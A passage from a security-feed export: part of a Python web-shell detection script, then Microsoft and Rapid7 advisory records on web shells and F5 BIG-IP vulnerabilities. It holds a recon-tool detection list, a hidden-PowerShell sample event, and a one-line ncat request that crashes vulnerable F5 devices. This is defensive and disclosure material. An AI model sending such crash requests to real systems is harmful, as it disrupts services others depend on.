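RECON_COMMANDS = {"arp.exe", "certutil.exe", "ipconfig.exe", "gpresult.exe",
                  "hostname.exe", "net.exe", "net1.exe", "netstat.exe",
                  "nltest.exe", "nslookup.exe", "ping.exe", "psexec.exe",
                  "qwinsta.exe", "route.exe", "systeminfo.exe", "tasklist.exe",
                  "whoami.exe", "wmic.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    file_name: str                    # FileName: the process being created
    initiating_file_name: str         # InitiatingProcessFileName: its parent
    initiating_command_line: str      # InitiatingProcessCommandLine
    initiating_parent_file_name: str  # InitiatingProcessParentFileName: grandparent


def is_web_server(name: str, command_line: str = "") -> bool:
    """Match on the process name or, like the KQL, on a 'tomcat' hint in the
    command line (Tomcat runs as java.exe, so the name alone is not enough)."""
    n = name.lower()
    return (n in WEB_SERVER_PROCESSES or n.startswith("tomcat")
            or "tomcat" in command_line.lower())


def unusual_children_of_web_servers(events: List[ProcessEvent]) -> List[str]:
    """First query: distinct process names spawned directly by a web server
    process, minus the build tooling it legitimately runs."""
    return sorted({e.file_name.lower() for e in events
                   if is_web_server(e.initiating_file_name, e.initiating_command_line)
                   and e.file_name.lower() not in BENIGN_CHILDREN})


def web_shell_recon(events: List[ProcessEvent]) -> List[Tuple[str, str, str, bool]]:
    """Second query: a shell whose parent is a web server process, running a
    child other than conhost.exe. Returns (web server, shell, child, is_recon)."""
    hits = []
    for e in events:
        if (is_web_server(e.initiating_parent_file_name)
                and e.initiating_file_name.lower() in SHELLS
                and e.file_name.lower() != "conhost.exe"):
            hits.append((e.initiating_parent_file_name, e.initiating_file_name,
                         e.file_name, e.file_name.lower() in RECON_COMMANDS))
    return hits


# Constructed sample: one benign compile, one web-shell command chain under
# IIS, one PowerShell launched by Tomcat, and unrelated desktop activity.
SAMPLE_EVENTS = [
    ProcessEvent("csc.exe", "w3wp.exe", 'w3wp.exe -ap "DefaultAppPool"', "svchost.exe"),
    ProcessEvent("cmd.exe", "w3wp.exe", 'w3wp.exe -ap "DefaultAppPool"', "svchost.exe"),
    ProcessEvent("whoami.exe", "cmd.exe", "cmd.exe /c whoami", "w3wp.exe"),
    ProcessEvent("conhost.exe", "cmd.exe", "cmd.exe /c whoami", "w3wp.exe"),
    ProcessEvent("net.exe", "powershell.exe", "powershell.exe -nop -w hidden", "w3wp.exe"),
    ProcessEvent("powershell.exe", "java.exe",
                 "java.exe -Dcatalina.home=C:\\tomcat9 org.apache.catalina.startup.Bootstrap",
                 "tomcat9.exe"),
    ProcessEvent("notepad.exe", "explorer.exe", "explorer.exe", "userinit.exe"),
]

if __name__ == "__main__":
    print("unusual web-server children:", unusual_children_of_web_servers(SAMPLE_EVENTS))
    for hit in web_shell_recon(SAMPLE_EVENTS):
        print("shell activity under web server:", hit)
```

The first pass is a baselining query (what does this web server spawn at all?), so its output still needs tuning per environment; the second pass is the higher-confidence signal, because the web server, shell, child triple is almost never produced by a legitimate application.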
As with most attack vectors, prevention is critical.\n\nOrganizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.\n * Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.\n * Enable antivirus protection on web servers. [Turn on cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.\n\nWeb shells and the attacks that they enable are a multi-faceted threat that require comprehensive visibility across domains and platforms. [Microsoft 365 Defender](<https://aka.ms/m365d>) correlates threat data from endpoints, email and data, identities, and apps to coordinate cross-domain protection. 
[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\n_Detection and Response Team (DART)_\n\n_Microsoft Defender Security Research Team_\n\n \n\nThe post [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-11T17:00:05", "type": "mmpc", "title": "Web shell attacks continue to rise", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-02-11T17:00:05", "id": "MMPC:9AAC6D759E6AD62F92B56B228C39C263", "href": "https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-25T16:50:12", "description": "\n\n**Update March 25, 2021:** CVE-2021-22986 is now being actively exploited in the wild by a range of malicious 
actors. Rapid7 has in-depth technical analysis on this vulnerability, including proof-of-concept code and information on indicators of compromise, available [here](<https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311>).\n\nOn March 10, 2021, F5 disclosed eight vulnerabilities, four of which are deemed "critical", the most severe of which is CVE-2021-22986, an **unauthenticated remote code execution** weakness that enables remote attackers to execute arbitrary commands on compromised BIG-IP devices:\n\n * [K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) (actively exploited in the wild)\n * [K18132488: Appliance mode TMUI authenticated remote command execution vulnerability CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n * [K70031188: TMUI authenticated remote command execution vulnerability CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>)\n * [K56142644: Appliance mode Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>)\n * [K45056101: Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>)\n * [K56715231: TMM buffer-overflow vulnerability CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>)\n * [K52510511: Advanced WAF/ASM buffer-overflow vulnerability CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n * [K66851119: F5 TMUI XSS vulnerability CVE-2021-22994](<https://support.f5.com/csp/article/K66851119>)\n\nOn March 18, 2021, NCC Group [reported seeing in the wild exploitation attempts](<https://twitter.com/NCCGroupInfosec/status/1372614697158053888?s=20>) and they, along with other sources, expect that final development of a complete attack chain is imminent.\n\nGiven that a complete exploit chain will be available soon, we 
recommend patching F5 systems that expose the affected planes (see below) externally within the next 3\u20135 days, and F5 systems that expose the affected planes only internally within a 30-day patch window that hopefully started eight days ago, provided that your organization follows a typical 30-, 60-, 90-day prioritization scheme. If your organization does not have a defined patch cadence, Rapid7 still recommends that you consider applying these internal system patches within the next 20 days.\n\n## Critical vulnerability overview\n\n### [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>)\n\n_iControl REST unauthenticated remote command execution vulnerability (CVSSv3 9.8)._\n\nAn HTTP REST API endpoint exposed on the **control plane** of F5 devices has an unauthenticated remote code execution vulnerability, enabling attackers to execute arbitrary code/commands on vulnerable devices. This affects BIG-IP 12.1.x through 16.0.x and BIG-IQ 6.x and 7.x (the BIG-IP centralized management platform) regardless of configuration; the exact fixed builds are listed in K03009991.\n\n### [CVE-2021-22991](<https://support.f5.com/csp/article/K90004114>)\n\n_Traffic Management Microkernel (TMM) buffer-overflow vulnerability (CVSSv3 9.0)._\n\nThe Traffic Management Microkernel (TMM), which handles requests to virtual servers on the **data plane**, improperly handles certain, undisclosed uniform resource identifiers (URIs). Malicious HTTP requests may cause a buffer overflow and result in a denial-of-service attack. 
You are vulnerable to exploits if any of the following configurations apply to your F5 deployments:\n\n * BIG-IP 12.1.x or later running BIG-IP Access Policy Manager (APM) in any configuration\n * Specific URI-handling functions (the ones the `normalize` grep below matches) are used in enabled iRules or LTM policies\n * The URL categorization feature is enabled and in use in either BIG-IP PEM or Secure Web Gateway\n\nFurthermore, customers in the F5 \"early access\" program are also vulnerable if they are using the Advanced WAF Risk Engine.\n\nThe following commands can be run from a TMOS Shell (tmsh) and will return iRules / LTM policies that can be reviewed against [example policies provided by F5](<https://support.f5.com/csp/article/K56715231>) to determine whether your configurations are at risk:\n \n \n tmsh -q -c \"cd / ; list /ltm rule recursive\" | egrep 'ltm rule|normalize' | grep -B1 normalize # iRules recursive query\n tmsh -q -c \"cd / ; list /ltm policy recursive\" | egrep 'ltm policy|normalize' | grep -B1 normalize # LTM policies recursive query\n \n\n### [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n\n_Appliance Mode TMUI **authenticated** remote command execution vulnerability (CVSSv3 9.9)._\n\nIf an F5 device is running in [appliance mode](<https://support.f5.com/csp/article/K12815>), the Traffic Management User Interface (TMUI)/Configuration utility on the **control plane** has an authenticated remote code execution vulnerability in undisclosed URL paths, enabling authenticated attackers to execute arbitrary code/commands on vulnerable devices.\n\n### [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n\n_Advanced WAF/ASM buffer-overflow vulnerability (CVSSv3 9.0)._\n\nIf an F5 Advanced WAF/BIG-IP ASM virtual server has a [Login Page](<https://techdocs.f5.com/en-us/bigip-14-1-0/big-ip-asm-implementations-14-1-0/creating-login-pages-for-secure-application-access.html>) policy defined, malicious HTTP **responses** may cause a buffer overflow, resulting in a 
denial-of-service attack and possibly remote code execution. This vulnerability is exposed on the **data plane**.\n\n**NOTE:** The **data plane** refers to any traffic handled by a virtual server, SNAT, NAT, or other non-control-plane-traffic handler. The **control plane** refers to management-related services and traffic flowing to them, such as the Configuration utility (TMUI), iControl REST, and SSH, either through the management IP address or a self IP address exposing the HTTPS or SSH ports (usually 443 or 22).\n\n## Selected expanded details\n\nA [Project Zero](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2132>) report on CVE-2021-22992 posted by [Felix Wilhelm](<https://twitter.com/_fel1x/status/1369675356073041924?s=20>) notes that the vulnerable condition is triggered when BIG-IP systems have rules in place that process HTTP response headers (login pages are given as an example). The web application firewall does not process overlong HTTP response headers properly, and this can lead to a stack-based overflow.\n\n_This is not a trivial weakness to set up_, and in many cases requires knowledge or control of back-end applications behind F5 systems. The researcher notes three scenarios where attackers may be able to gain more granular control over HTTP response headers:\n\n 1. **HTTP header injection**: If one of the backend applications sitting behind an F5 system does not properly handle carriage returns/line feeds (CR/LF) in inbound HTTP headers that are reflected into the HTTP response, an attacker can use this weakness in that application (_not the F5 system itself_) to cause the overflow in the F5 system.\n 2. **Request smuggling + HTTP/0.9**: Some F5 configurations may still be vulnerable to various [request smuggling](<https://en.wikipedia.org/wiki/HTTP_request_smuggling>) techniques. Attackers may use an old version of the HTTP protocol (HTTP/0.9) to issue a simplified request to F5-fronted applications. 
These HTTP/0.9 requests return only the response body, with no status line or response headers. It may be possible to craft such a request so that a user-controllable HTML response triggers this stack-based overflow.\n 3. **Compromised backend**: If an attacker has control over one or more F5-fronted applications, they may be able to use those systems to craft sufficiently large responses to trigger the overflow condition.\n\nThe same researcher also posted a [Project Zero report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2126>) on CVE-2021-22991 noting a weakness in how IPv6 hostnames are processed. An example configuration and demonstration is provided there and reproduced below.\n\nIf there is an F5 iRule such as:\n \n \n when HTTP_REQUEST { \n log local0. \"normalized: [HTTP::uri -normalized]\" \n log local0. \"uri: [HTTP::uri]\"\n }\n \n\na malicious request of the form:\n \n \n echo -e \"GET h://[f] HTTP/1.1\\r\\n\\r\\n\" | ncat --ssl 10.154.0.3 443\n \n\nwill write uninitialized memory to `/var/log/ltm` on the F5 host and can lead directly to a crash of the Traffic Management Microkernel and, thus, a denial of service.\n\nExploitation depends on certain iRule configurations being in place, but attackers have plenty of time on their hands and an abundance of compromised hosts available to try many combinations of requests, and F5 systems are easily discoverable on the internet.\n\n## Available mitigations\n\nUntil it is possible to install fixed versions, organizations can use the following F5 procedures as temporary mitigations for CVE-2021-22986 by restricting access to the iControl REST API endpoints (CVE-2021-22987 is in the TMUI, which these two procedures do not cover; see K18132488 for that vulnerability):\n\n * [Block iControl REST access through the self IP address](<https://support.f5.com/csp/article/K03009991#proc1>)\n * [Block iControl REST access through the management interface](<https://support.f5.com/csp/article/K03009991#proc2>)\n\n## InsightVM Coverage\n\nWe currently have coverage for the following CVEs:\n\n * 
CVE-2021-22986\n * CVE-2021-22987\n * CVE-2021-22988\n * CVE-2021-22991\n * CVE-2021-22994\n\nWe are investigating coverage for the remaining three CVEs affecting F5 Advanced WAF/BIG-IP ASM:\n\n * CVE-2021-22989\n * CVE-2021-22990\n * CVE-2021-22992\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-18T20:19:22", "type": "rapid7blog", "title": "F5 Discloses Eight Vulnerabilities\u2014Including Four Critical Ones\u2014in BIG-IP Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992", "CVE-2021-22994"], "modified": "2021-03-18T20:19:22", "id": "RAPID7BLOG:72759E1136A76135F26DD97485912606", "href": "https://blog.rapid7.com/2021/03/18/f5-discloses-eight-vulnerabilities-including-four-critical-ones-in-big-ip-systems/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-02T20:50:20", "description": "## Sprinkle on the Modules\n\n\n\n \nThe first quarter of 2021 has given us wave after wave of Exchange vulnerabilities, and while our awesome contributors helped us continue coverage with another Exchange module we were able to add to Metasploit, we also added modules covering very heavy-hitting vulnerabilities in F5, SAP, and SaltStack that may have gotten less notice in the shadow of the Exchange vulnerabilities earlier this quarter. This update offers two new modules from community contributor Vladimir Ivanov targeting remote code execution vulnerabilities in SAP, a new module by our own Will Vu covering a remote code execution vulnerability in F5 Big